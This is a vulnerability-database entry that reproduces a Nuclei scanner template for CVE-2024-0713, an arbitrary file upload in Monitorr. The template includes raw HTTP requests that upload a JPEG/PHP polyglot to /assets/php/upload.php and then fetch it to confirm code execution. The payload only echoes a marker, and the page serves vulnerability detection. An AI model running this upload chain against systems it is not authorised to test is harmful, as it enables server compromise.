Lucene search
K

Monitorr Services Configuration - Arbitrary File Upload

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 174 Views

Monitorr Services Configuration vulnerability - Arbitrary File Uploa

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-0713
26 Jan 202415:15
circl
CNNVD
Number withdrawn
19 Jan 202400:00
cnnvd
CVE
CVE-2024-0713
19 Jan 202414:00
cve
Cvelist
CVE-2024-0713
19 Jan 202414:00
cvelist
NVD
CVE-2024-0713
19 Jan 202414:15
nvd
Prion
Out-of-bounds
19 Jan 202414:15
prion
Positive Technologies
PT-2024-15774 · Monitorr · Monitorr
19 Jan 202400:00
ptsecurity
id: CVE-2024-0713

info:
  name: Monitorr Services Configuration - Arbitrary File Upload
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Authenticated attackers can upload malicious files to achieve remote code execution, potentially compromising the entire Monitorr server and gaining access to monitored services.
  remediation: |
    Upgrade to the latest patched version of Monitorr or apply vendor-provided security updates.
  reference:
    - https://github.com/Tropinene/Yscanner
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-0713
    cwe-id: CWE-434
    epss-score: 0.00061
    epss-percentile: 0.2356
    cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: monitorr
    product: monitorr
    shodan-query: http.favicon.hash:"-211006074"
    fofa-query: "icon_hash=\"-211006074\""
  tags: cve,cve2024,file-upload,intrusive,monitorr,vuln
variables:
  file: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /assets/php/upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn

        ------WebKitFormBoundaryaquxwjsn
        Content-Disposition: form-data; name="fileToUpload"; filename="{{file}}.php"
        Content-Type: image/jpeg

        {{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}
        ------WebKitFormBoundaryaquxwjsn--

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - "has been uploaded to:"

  - raw:
      - |
        GET /assets/data/usrimg/{{file}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "atfersotg"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022056e95fc9be07ac3fe02483d5d2c00d22072075901c2f453453a17c26acf176230221008e1f3fa0fe8bc46855923789bceffbce568bbc89d1090caec846cd1f8e4ed2f7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation